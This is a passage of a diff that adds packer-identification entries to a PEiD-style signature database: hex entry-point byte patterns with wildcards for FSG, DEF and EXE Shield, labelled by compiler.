+signature = 03 DE EB 01 F8 B8 80 ?? 42 00 EB 02 CD 20 68 17 A0 B3 AB EB 01 E8 59 0F B6 DB 68 0B A1 B3 AB EB 02 CD 20 5E 80 CB AA 2B F1 EB 02 CD 20 43 0F BE 38 13 D6 80 C3 47 2B FE EB 01 F4 03 FE EB 02 4F 4E 81 EF 93 53 7C 3C 80 C3 29 81 F7 8A 8F 67 8B 80 C3 C7 2B FE EB 02 CD 20 57 EB 02 CD 20 5A 88 10 EB 02 CD 20 40 E8 02 00 00 00 C5 62 5A 4E E8 01 00 00 00 43 5A 2B DB 3B F3 75 B1 C1 F3 0D 92 B8 DC 0C 4E 0D B7 F7 0A 39 F4 B5 ?? ?? 36 FF 45 D9 FA FB FE FD FE CD 6B FE 82 0D 28 F3 B6 A6 A0 71 1F BA 92 9C EE DA FE 0D 47 DB 09 AE DF E3 F6 50 E4 12 9E C8 EC FB 4D EA 77 C9 03 75 E0 D2 D6 E5 E2 8B 41 B6 41 FA 70 B0 A0 AB F9 B5 C0 BF ED 78 25 CB 96 E5 A8 A7 AA A0 DC 5F 73 9D 14 F0 B5 6A 87 B7 3B E5 6D 77 B2 45 8C B9 96 95 A0 DC A2 1E 9C 9B 11 93 08 83 9B F8 9E 0A 8E 10 F7 85
+ep_only = true
+
+[FSG v1.20 (Eng) -> dulek/xt -> (Microsoft Visual C++ 6.0)]
+signature = C1 E0 06 EB 02 CD 20 EB 01 27 EB 01 24 BE 80 ?? 42 00 49 EB 01 99 8D 1D F4 00 00 00 EB 01 5C F7 D8 1B CA EB 01 31 8A 16 80 E9 41 EB 01 C2 C1 E0 0A EB 01 A1 81 EA A8 8C 18 A1 34 46 E8 01 00 00 00 62 59 32 D3 C1 C9 02 EB 01 68 80 F2 1A 0F BE C9 F7 D1 2A D3 EB 02 42 C0 EB 01 08 88 16 80 F1 98 80 C9 28 46 91 EB 02 C0 55 4B EB 01 55 34 44 0B DB 75 AD E8 01 00 00 00 9D 59 0B C6 EB 01 6C E9 D2 C3 82 C2 03 C2 B2 82 C2 00 ?? ?? 7C C2 6F DA BC C2 C2 C2 CC 1C 3D CF 4C D8 84 D0 0C FD F0 42 77 0D 66 F1 AC C1 DE CE 97 BA D7 EB C3 AE DE 91 AA D5 02 0D 1E EE 3F 23 77 C4 01 72 12 C1 0E 1E 14 82 37 AB 39 01 88 C9 DE CA 07 C2 C2 C2 17 79 49 B2 DA 0A C2 C2 C2 A9 EA 6E 91 AA 2E 03 CF 7B 9F CE 51 FA 6D A2 AA 56 8A E4 C2 C2 C2 07 C2 47 C2 C2 17 B8 42 C6 8D 31 88 45 BA 3D 2B BC
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (MASM32 / TASM32)]
+signature = 03 F7 23 FE 33 FB EB 02 CD 20 BB 80 ?? 40 00 EB 01 86 EB 01 90 B8 F4 00 00 00 83 EE 05 2B F2 81 F6 EE 00 00 00 EB 02 CD 20 8A 0B E8 02 00 00 00 A9 54 5E C1 EE 07 F7 D7 EB 01 DE 81 E9 B7 96 A0 C4 EB 01 6B EB 02 CD 20 80 E9 4B C1 CF 08 EB 01 71 80 E9 1C EB 02 F0 49 C1 F6 09 88 0B F7 DE 0F B6 F2 43 EB 02 CD 20 C1 E7 0A 48 EB 01 89 C1 E7 14 2B FF 3B C7 75 A8 E8 01 00 00 00 81 5F F7 D7 D9 EE 1F 5E 1E DD 1E 2E 5E 1E DC ?? ?? 5E 1E 71 06 28 1E 1E 1E 20 F0 93 23 A8 34 64 30 F0 E1 D0 9E 51 F9 C2 D1 20 1D 32 42 91 16 51 E7 1D 32 42 91 36 51 DE 1D 32 42 91 3F D1 20 5F CE 2E 1D 32 42 30 DE 91 17 93 5D C8 09 FA 06 61 1E 1E 1E 49 E9 93 2E 06 56 1E 1E 1E 09 46 CA EF 06 92 5F 31 E7 09 3A AF 66 DF FE 26 CA 06 40 1E 1E 1E 5B 1E 9B 1E 1E 91 28 9E 1A 23 91 24 A1 16 9D 95 20
+ep_only = true
+
+[FSG v1.20 (Eng) -> dulek/xt -> (MASM32 / TASM32)]
+signature = 33 C2 2C FB 8D 3D 7E 45 B4 80 E8 02 00 00 00 8A 45 58 68 02 ?? 8C 7F EB 02 CD 20 5E 80 C9 16 03 F7 EB 02 40 B0 68 F4 00 00 00 80 F1 2C 5B C1 E9 05 0F B6 C9 8A 16 0F B6 C9 0F BF C7 2A D3 E8 02 00 00 00 99 4C 58 80 EA 53 C1 C9 16 2A D3 E8 02 00 00 00 9D CE 58 80 EA 33 C1 E1 12 32 D3 48 80 C2 26 EB 02 CD 20 88 16 F7 D8 46 EB 01 C0 4B 40 8D 0D 00 00 00 00 3B D9 75 B7 EB 01 14 EB 01 0A CF C5 93 53 90 DA 96 67 54 8D CC ?? ?? 51 8E 18 74 53 82 83 80 47 B4 D2 41 FB 64 31 6A AF 7D 89 BC 0A 91 D7 83 37 39 43 50 A2 32 DC 81 32 3A 4B 97 3D D9 63 1F 55 42 F0 45 32 60 9A 28 51 61 4B 38 4B 12 E4 49 C4 99 09 47 F9 42 8C 48 51 4E 70 CF B8 12 2B 78 09 06 07 17 55 D6 EA 10 8D 3F 28 E5 02 0E A2 58 B8 D6 0F A8 E5 10 EB E8 F1 23 EF 61 E5 E2 54 EA A9 2A 22 AF 17 A1 23 97 9A 1C
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (Microsoft Visual C++ 6.0 / 7.0)]
+signature = 0B D0 8B DA E8 02 00 00 00 40 A0 5A EB 01 9D B8 80 ?? ?? 00 EB 02 CD 20 03 D3 8D 35 F4 00 00 00 EB 01 35 EB 01 88 80 CA 7C 80 F3 74 8B 38 EB 02 AC BA 03 DB E8 01 00 00 00 A5 5B C1 C2 0B 81 C7 DA 10 0A 4E EB 01 08 2B D1 83 EF 14 EB 02 CD 20 33 D3 83 EF 27 EB 02 82 53 EB 02 CD 20 87 FA 88 10 80 F3 CA EB 02 CD 20 40 03 D7 0B D0 4E 1B D2 EB 02 CD 20 2B D2 3B F2 75 AC F7 DA 80 C3 AF 91 1C 31 62 A1 61 20 61 71 A1 61 1F ?? ?? ?? 61 B4 49 6B 61 61 61 63 33 D6 66 EB 77 A7 73 33 24 13 E1 94 3C 05 14 63 60 75 85 D4 59 94 2A 60 75 85 D4 79 94 21 60 75 85 D4 82 14 63 A2 11 71 60 75 85 73 21 D4 5A D6 A0 0B 4C 3D 49 A4 61 61 61 8C 2C D6 71 49 99 61 61 61 4C 89 0D 32 49 D5 A2 74 2A 4C 7D F2 A9 22 41 69 0D 49 83 61 61 61 9E 61 DE 61 61 D4 6B E1 5D 66 D4 67 E4 59 E0 D8 63
+ep_only = true
+
+[FSG v1.20 (Eng) -> dulek/xt -> (Microsoft Visual C++ 6.0 / 7.0)]
+signature = EB 02 CD 20 EB 01 91 8D 35 80 ?? ?? 00 33 C2 68 83 93 7E 7D 0C A4 5B 23 C3 68 77 93 7E 7D EB 01 FA 5F E8 02 00 00 00 F7 FB 58 33 DF EB 01 3F E8 02 00 00 00 11 88 58 0F B6 16 EB 02 CD 20 EB 02 86 2F 2A D3 EB 02 CD 20 80 EA 2F EB 01 52 32 D3 80 E9 CD 80 EA 73 8B CF 81 C2 96 44 EB 04 EB 02 CD 20 88 16 E8 02 00 00 00 44 A2 59 46 E8 01 00 00 00 AD 59 4B 80 C1 13 83 FB 00 75 B2 F7 D9 96 8F 80 4D 0C 4C 91 50 1C 0C 50 8A ?? ?? ?? 50 E9 34 16 50 4C 4C 0E 7E 9B 49 C6 32 02 3E 7E 7B 5E 8C C5 6B 50 3F 0E 0F 38 C8 95 18 D1 65 11 2C B8 87 28 C3 4C 0B 3C AC D9 2D 15 4E 8F 1C 40 4F 28 98 3E 10 C1 45 DB 8F 06 3F EC 48 61 4C 50 50 81 DF C3 20 34 84 10 10 0C 1F 68 DC FF 24 8C 4D 29 F5 1D 2C BF 74 CF F0 24 C0 08 2E 0C 0C 10 51 0C 91 10 10 81 16 D0 54 4B D7 42 C3 54 CB C9 4E
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (Microsoft Visual C++ 6.0 / 7.0)]
+signature = F7 DB 80 EA BF B9 2F 40 67 BA EB 01 01 68 AF ?? A7 BA 80 EA 9D 58 C1 C2 09 2B C1 8B D7 68
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (Microsoft Visual C++ 6.0 / 7.0)]
+signature = F7 D8 40 49 EB 02 E0 0A 8D 35 80 ?? ?? ?? 0F B6 C2 EB 01 9C 8D 1D F4 00 00 00 EB 01 3C 80
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (Microsoft Visual C++ 6.0 / 7.0)]
+signature = 87 FE E8 02 00 00 00 98 CC 5F BB 80 ?? ?? 00 EB 02 CD 20 68 F4 00 00 00 E8 01 00 00 00 E3
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (Borland Delphi / Microsoft Visual C++)]
+signature = 1B DB E8 02 00 00 00 1A 0D 5B 68 80 ?? ?? 00 E8 01 00 00 00 EA 5A 58 EB 02 CD 20 68 F4 00 00 00 EB 02 CD 20 5E 0F B6 D0 80 CA 5C 8B 38 EB 01 35 EB 02 DC 97 81 EF F7 65 17 43 E8 02 00 00 00 97 CB 5B 81 C7 B2 8B A1 0C 8B D1 83 EF 17 EB 02 0C 65 83 EF 43 13 D6 83 C7 32 F7 DA 03 FE EB 02 CD 20 87 FA 88 10 EB 02 CD 20 40 E8 02 00 00 00 F1 F8 5B 4E 2B D2 85 F6 75 AF EB 02 DE 09 EB 01 EF 34 4A 7C BC 7D 3D 7F 90 C1 82 41 ?? ?? ?? 87 DB 71 94 8B 8C 8D 90 61 05 96 1C A9 DA A7 68 5A 4A 19 CD 76 40 50 A0 9E B4 C5 15 9B D7 6E A5 BB CC 1C C2 DE 6C AC C2 D3 23 D2 65 B5 F5 65 C6 B6 CC DD CC 7B 2F B6 33 FE 6A AC 9E AB 07 C5 C6 C7 F3 94 3F DB B4 05 CE CF D0 BC FA 7F A5 BD 4A 18 EB A2 C5 F7 6D 25 9F BF E8 8D CA 05 E4 E5 E6 24 E8 66 EA EB 5F F7 6E EB F5 64 F8 76 EC 74 6D F9
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (Borland Delphi / Microsoft Visual C++)]
+signature = C1 C8 10 EB 01 0F BF 03 74 66 77 C1 E9 1D 68 83 ?? ?? 77 EB 02 CD 20 5E EB 02 CD 20 2B F7
+ep_only = true
+
+[FSG v1.20 (Eng) -> dulek/xt -> (Borland Delphi / Microsoft Visual C++)]
+signature = 0F B6 D0 E8 01 00 00 00 0C 5A B8 80 ?? ?? 00 EB 02 00 DE 8D 35 F4 00 00 00 F7 D2 EB 02 0E EA 8B 38 EB 01 A0 C1 F3 11 81 EF 84 88 F4 4C EB 02 CD 20 83 F7 22 87 D3 33 FE C1 C3 19 83 F7 26 E8 02 00 00 00 BC DE 5A 81 EF F7 EF 6F 18 EB 02 CD 20 83 EF 7F EB 01 F7 2B FE EB 01 7F 81 EF DF 30 90 1E EB 02 CD 20 87 FA 88 10 80 EA 03 40 EB 01 20 4E EB 01 3D 83 FE 00 75 A2 EB 02 CD 20 EB 01 C3 78 73 42 F7 35 6C 2D 3F ED 33 97 ?? ?? ?? 5D F0 45 29 55 57 55 71 63 02 72 E9 1F 2D 67 B1 C0 91 FD 10 58 A3 90 71 6C 83 11 E0 5D 20 AE 5C 71 83 D0 7B 10 97 54 17 11 C0 0E 00 33 76 85 33 3C 33 21 31 F5 50 CE 56 6C 89 C8 F7 CD 70 D5 E3 DD 08 E8 4E 25 FF 0D F3 ED EF C8 0B 89 A6 CD 77 42 F0 A6 C8 19 66 3D B2 CD E7 89 CB 13 D7 D5 E3 1E DF 5A E3 D5 50 DF B3 39 32 C0 2D B0 3F B4 B4 43
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (Borland C++)]
+signature = 23 CA EB 02 5A 0D E8 02 00 00 00 6A 35 58 C1 C9 10 BE 80 ?? ?? 00 0F B6 C9 EB 02 CD 20 BB F4 00 00 00 EB 02 04 FA EB 01 FA EB 01 5F EB 02 CD 20 8A 16 EB 02 11 31 80 E9 31 EB 02 30 11 C1 E9 11 80 EA 04 EB 02 F0 EA 33 CB 81 EA AB AB 19 08 04 D5 03 C2 80 EA 33 0F B6 C9 0F BE 0E 88 16 EB 01 5F EB 01 6B 46 EB 01 6D 0F BE C0 4B EB 02 CD 20 0F BE C9 2B C9 3B D9 75 B0 EB 01 99 C1 C1 05 91 9D B2 E3 22 E2 A1 E2 F2 22 E2 A0 ?? ?? ?? E2 35 CA EC E2 E2 E2 E4 B4 57 E7 6C F8 28 F4 B4 A5 94 62 15 BD 86 95 E4 E1 F6 06 55 DA 15 AB E1 F6 06 55 FA 15 A2 E1 F6 06 55 03 95 E4 23 92 F2 E1 F6 06 F4 A2 55 DB 57 21 8C CD BE CA 25 E2 E2 E2 0D AD 57 F2 CA 1A E2 E2 E2 CD 0A 8E B3 CA 56 23 F5 AB CD FE 73 2A A3 C2 EA 8E CA 04 E2 E2 E2 1F E2 5F E2 E2 55 EC 62 DE E7 55 E8 65 DA 61 59 E4
+ep_only = true
+
+[FSG v1.20 (Eng) -> dulek/xt -> (Borland C++)]
+signature = C1 F0 07 EB 02 CD 20 BE 80 ?? ?? 00 1B C6 8D 1D F4 00 00 00 0F B6 06 EB 02 CD 20 8A 16 0F B6 C3 E8 01 00 00 00 DC 59 80 EA 37 EB 02 CD 20 2A D3 EB 02 CD 20 80 EA 73 1B CF 32 D3 C1 C8 0E 80 EA 23 0F B6 C9 02 D3 EB 01 B5 02 D3 EB 02 DB 5B 81 C2 F6 56 7B F6 EB 02 56 7B 2A D3 E8 01 00 00 00 ED 58 88 16 13 C3 46 EB 02 CD 20 4B EB 02 CD 20 2B C9 3B D9 75 A1 E8 02 00 00 00 D7 6B 58 EB 00 9E 96 6A 28 67 AB 69 54 03 3E 7F ?? ?? ?? 31 0D 63 44 35 38 37 18 87 9F 10 8C 37 C6 41 80 4C 5E 8B DB 60 4C 3A 28 08 30 BF 93 05 D1 58 13 2D B8 86 AE C8 58 16 A6 95 C5 94 03 33 6F FF 92 20 98 87 9C E5 B9 20 B5 68 DE 16 4A 15 C1 7F 72 71 65 3E A9 85 20 AF 5A 59 54 26 66 E9 3F 27 DE 8E 7D 34 53 61 F7 AF 09 29 5C F7 36 83 60 5F 52 92 5C D0 56 55 C9 61 7A FD EF 7E E8 70 F8 6E 7B EF
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (Borland Delphi / Borland C++)]
+signature = 2B C2 E8 02 00 00 00 95 4A 59 8D 3D 52 F1 2A E8 C1 C8 1C BE 2E ?? ?? 18 EB 02 AB A0 03 F7 EB 02 CD 20 68 F4 00 00 00 0B C7 5B 03 CB 8A 06 8A 16 E8 02 00 00 00 8D 46 59 EB 01 A4 02 D3 EB 02 CD 20 02 D3 E8 02 00 00 00 57 AB 58 81 C2 AA 87 AC B9 0F BE C9 80 EA 0F E8 01 00 00 00 64 59 02 D3 EB 02 D6 5C 88 16 EB 02 CD 20 46 E8 02 00 00 00 6B B5 59 4B 0F B7 C6 0B DB 75 B1 EB 02 50 AA 91 44 5C 90 D2 95 57 9B AE E1 A4 65 ?? ?? ?? B3 09 A1 C6 BF C2 C5 CA 9D 43 D6 5E ED 20 EF B2 A6 98 69 1F CA 96 A8 FA FA 12 25 77 FF 3D D6 0F 27 3A 8C 34 52 E2 24 3C 4F A1 52 E7 39 7B ED 50 42 5A 6D 5E 0F C5 4E CD 9A 08 4C 40 4F AD 6D 70 73 A1 44 F1 8F 6A BD 88 8B 8E 7C BC 43 6B 85 14 E4 B9 72 97 CB 43 FD 79 9B C6 6D AC E9 CA CD D0 10 D6 56 DC DF 55 EF 68 E7 F3 64 FA 7A F2 7C 77 05
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (Borland Delphi / Borland C++)]
+signature = EB 01 2E EB 02 A5 55 BB 80 ?? ?? 00 87 FE 8D 05 AA CE E0 63 EB 01 75 BA 5E CE E0 63 EB 02
+ep_only = true
+
+[FSG v1.20 (Eng) -> dulek/xt -> (Borland Delphi / Borland C++)]
+signature = 0F BE C1 EB 01 0E 8D 35 C3 BE B6 22 F7 D1 68 43 ?? ?? 22 EB 02 B5 15 5F C1 F1 15 33 F7 80 E9 F9 BB F4 00 00 00 EB 02 8F D0 EB 02 08 AD 8A 16 2B C7 1B C7 80 C2 7A 41 80 EA 10 EB 01 3C 81 EA CF AE F1 AA EB 01 EC 81 EA BB C6 AB EE 2C E3 32 D3 0B CB 81 EA AB EE 90 14 2C 77 2A D3 EB 01 87 2A D3 E8 01 00 00 00 92 59 88 16 EB 02 52 08 46 EB 02 CD 20 4B 80 F1 C2 85 DB 75 AE C1 E0 04 EB 00 DA B2 82 5C 9B C7 89 98 4F 8A F7 ?? ?? ?? B1 4D DF B8 AD AC AB D4 07 27 D4 50 CF 9A D5 1C EC F2 27 77 18 40 4E A4 A8 B4 CB 9F 1D D9 EC 1F AD BC 82 AA C0 4C 0A A2 15 45 18 8F BB 07 93 BE C0 BC A3 B0 9D 51 D4 F1 08 22 62 96 6D 09 73 7E 71 A5 3A E5 7D 94 A3 96 99 98 72 B2 31 57 7B FA AE 9D 28 4F 99 EF A3 25 49 60 03 42 8B 54 53 5E 92 50 D4 52 4D C1 55 76 FD F7 8A FC 78 0C 82 87 0F
+ep_only = true
+
+[DEF v1.00 (Eng) -> bart/xt]
+signature = BE ?? 01 40 00 6A ?? 59 80 7E 07 00 74 11 8B 46 0C 05 00 00 40 00 8B 56 10 30 10 40 4A 75 FA 83 C6 28 E2 E4 68 ?? ?? 40 00 C3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+ep_only = true
+
+[EXE Shield v0.1b - v0.3b, v0.3 -> SMoKE]
+signature = E8 04 00 00 00 83 60 EB 0C 5D EB 05
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (Borland Delphi / Microsoft Visual C++ / ASM)]
+signature = EB 02 CD 20 EB 02 CD 20 EB 02 CD 20 C1 E6 18 BB 80 ?? ?? 00 EB 02 82 B8 EB 01 10 8D 05 F4
+ep_only = true
+
+[FSG v1.10 (Eng) -> bart/xt -> WinRAR-SFX]
+signature = EB 01 02 EB 02 CD 20 B8 80 ?? 42 00 EB 01 55 BE F4 00 00 00 13 DF 13 D8 0F B6 38 D1 F3 F7
+ep_only = true
+
+[FSG v1.10 (Eng) -> bart/xt -> WinRAR-SFX]
+signature = 80 E9 A1 C1 C1 13 68 E4 16 75 46 C1 C1 05 5E EB 01 9D 68 64 86 37 46 EB 02 8C E0 5F F7 D0
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (Microsoft Visual C++ 6.0 / 7.0 / ASM)]
+signature = E8 01 00 00 00 5A 5E E8 02 00 00 00 BA DD 5E 03 F2 EB 01 64 BB 80 ?? ?? 00 8B FA EB 01 A8
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (Microsoft Visual C++ 6.0 / ASM)]
+signature = F7 D0 EB 02 CD 20 BE BB 74 1C FB EB 02 CD 20 BF 3B ?? ?? FB C1 C1 03 33 F7 EB 02 CD 20 68
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (Microsoft Visual Basic / MASM32)]
+signature = EB 02 09 94 0F B7 FF 68 80 ?? ?? 00 81 F6 8E 00 00 00 5B EB 02 11 C2 8D 05 F4 00 00 00 47
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (Microsoft Visual Basic 5.0 / 6.0)]
+signature = C1 CB 10 EB 01 0F B9 03 74 F6 EE 0F B6 D3 8D 05 83 ?? ?? EF 80 F3 F6 2B C1 EB 01 DE 68 77
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (Microsoft Visual C++ 6.0 / 7.0)]
+signature = EB 02 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (Microsoft Visual C++ 6.0)]
+signature = E8 01 00 00 00 0E 59 E8 01 00 00 00 58 58 BE 80 ?? ?? 00 EB 02 61 E9 68 F4 00 00 00 C1 C8
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (Microsoft Visual C++ 6.0)]
+signature = F7 DB 80 EA BF B9 2F 40 67 BA EB 01 01 68 AF ?? ?? BA 80 EA 9D 58 C1 C2 09 2B C1 8B D7 68
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (Microsoft Visual C++ 6.0)]
+signature = D1 E9 03 C0 68 80 ?? ?? 00 EB 02 CD 20 5E 40 BB F4 00 00 00 33 CA 2B C7 0F B6 16 EB 01 3E
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (Microsoft Visual C++ 6.0)]
+signature = EB 02 AB 35 EB 02 B5 C6 8D 05 80 ?? ?? 00 C1 C2 11 BE F4 00 00 00 F7 DB F7 DB 0F BE 38 E8
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (Microsoft Visual C++ 6.0)]
+signature = 03 DE EB 01 F8 B8 80 ?? 42 00 EB 02 CD 20 68 17 A0 B3 AB EB 01 E8 59 0F B6 DB 68 0B A1 B3
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (MASM32 / TASM32)]
+signature = 03 F7 23 FE 33 FB EB 02 CD 20 BB 80 ?? 40 00 EB 01 86 EB 01 90 B8 F4 00 00 00 83 EE 05 2B
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (MASM32 / TASM32 / Microsoft Visual Basic)]
+signature = F7 D8 0F BE C2 BE 80 ?? ?? 00 0F BE C9 BF 08 3B 65 07 EB 02 D8 29 BB EC C5 9A F8 EB 01 94
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (Microsoft Visual C++ 6.0 / 7.0)]
+signature = F7 DB 80 EA BF B9 2F 40 67 BA EB 01 01 68 AF ?? A7 BA 80 EA 9D 58 C1 C2 09 2B C1 8B D7 68
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (Microsoft Visual C++ 4.x / LCC Win32 1.x)]
+signature = 2C 71 1B CA EB 01 2A EB 01 65 8D 35 80 ?? ?? 00 80 C9 84 80 C9 68 BB F4 00 00 00 EB 01 EB
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (Borland Delphi / Borland C++)]
+signature = EB 01 2E EB 02 A5 55 BB 80 ?? ?? 00 87 FE 8D 05 AA CE E0 63 EB 01 75 BA 5E CE E0 63 EB 02
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (Borland C++)]
+signature = 23 CA EB 02 5A 0D E8 02 00 00 00 6A 35 58 C1 C9 10 BE 80 ?? ?? 00 0F B6 C9 EB 02 CD 20 BB
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (Microsoft Visual C++ 6.0 / 7.0)]
+signature = 87 FE E8 02 00 00 00 98 CC 5F BB 80 ?? ?? 00 EB 02 CD 20 68 F4 00 00 00 E8 01 00 00 00 E3
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (Microsoft Visual C++ 6.0 / 7.0)]
+signature = F7 D8 40 49 EB 02 E0 0A 8D 35 80 ?? ?? ?? 0F B6 C2 EB 01 9C 8D 1D F4 00 00 00 EB 01 3C 80
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (Microsoft Visual C++ 6.0 / 7.0)]
+signature = 0B D0 8B DA E8 02 00 00 00 40 A0 5A EB 01 9D B8 80 ?? ?? ?? EB 02 CD 20 03 D3 8D 35 F4 00
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (Microsoft Visual C++ 6.0 / 7.0)]
+signature = 87 FE ?? 02 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (Microsoft Visual C++ 6.0)]
+signature = 91 EB 02 CD 20 BF 50 BC 04 6F 91 BE D0 ?? ?? 6F EB 02 CD 20 2B F7 EB 02 F0 46 8D 1D F4 00
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (Microsoft Visual C++ 5.0 / 6.0)]
+signature = 33 D2 0F BE D2 EB 01 C7 EB 01 D8 8D 05 80 ?? ?? ?? EB 02 CD 20 EB 01 F8 BE F4 00 00 00 EB
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (MASM32)]
+signature = EB 01 DB E8 02 00 00 00 86 43 5E 8D 1D D0 75 CF 83 C1 EE 1D 68 50 ?? 8F 83 EB 02 3D 0F 5A
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (Borland Delphi / Microsoft Visual C++)x]
+signature = 1B DB E8 02 00 00 00 1A 0D 5B 68 80 ?? ?? 00 E8 01 00 00 00 EA 5A 58 EB 02 CD 20 68 F4 00
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (Borland Delphi / Borland C++)]
+signature = 2B C2 E8 02 00 00 00 95 4A 59 8D 3D 52 F1 2A E8 C1 C8 1C BE 2E ?? ?? 18 EB 02 AB A0 03 F7
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (Borland Delphi / Microsoft Visual C++)]
+signature = C1 C8 10 EB 01 0F BF 03 74 66 77 C1 E9 1D 68 83 ?? ?? 77 EB 02 CD 20 5E EB 02 CD 20 2B F7
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (Microsoft Visual C++ 6.0)]
+signature = C1 CE 10 C1 F6 0F 68 00 ?? ?? 00 2B FA 5B 23 F9 8D 15 80 ?? ?? 00 E8 01 00 00 00 B6 5E 0B
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (Microsoft Visual C++ 6.0)]
+signature = EB 01 ?? EB ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 80
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (Microsoft Visual C++ 6.0)]
+signature = EB 01 4D 83 F6 4C 68 80 ?? ?? 00 EB 02 CD 20 5B EB 01 23 68 48 1C 2B 3A E8 02 00 00 00 38
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (Borland Delphi 2.0)]
+signature = EB 01 56 E8 02 00 00 00 B2 D9 59 68 80 ?? 41 00 E8 02 00 00 00 65 32 59 5E EB 02 CD 20 BB
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (Borland C++ 1999)]
+signature = EB 02 CD 20 2B C8 68 80 ?? ?? 00 EB 02 1E BB 5E EB 02 CD 20 68 B1 2B 6E 37 40 5B 0F B6 C9
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (Microsoft Visual C++ 6.0)]
+signature = EB 02 CD 20 ?? CF ?? ?? 80 ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? 00
+ep_only = true
+
+[FSG v1.10 (Eng) -> bart/xt -> (Watcom C/C++ EXE)]
+signature = EB 02 CD 20 03 ?? 8D ?? 80 ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? EB 02
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (MS Visual C++ / Borland C++ / Watcom C++)]
+signature = EB 02 CD 20
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (Borland Delphi 4.0 - 5.0)]
+signature = ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? EB 02 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 46 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 75
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (Microsoft Visual C++ 7.0)]
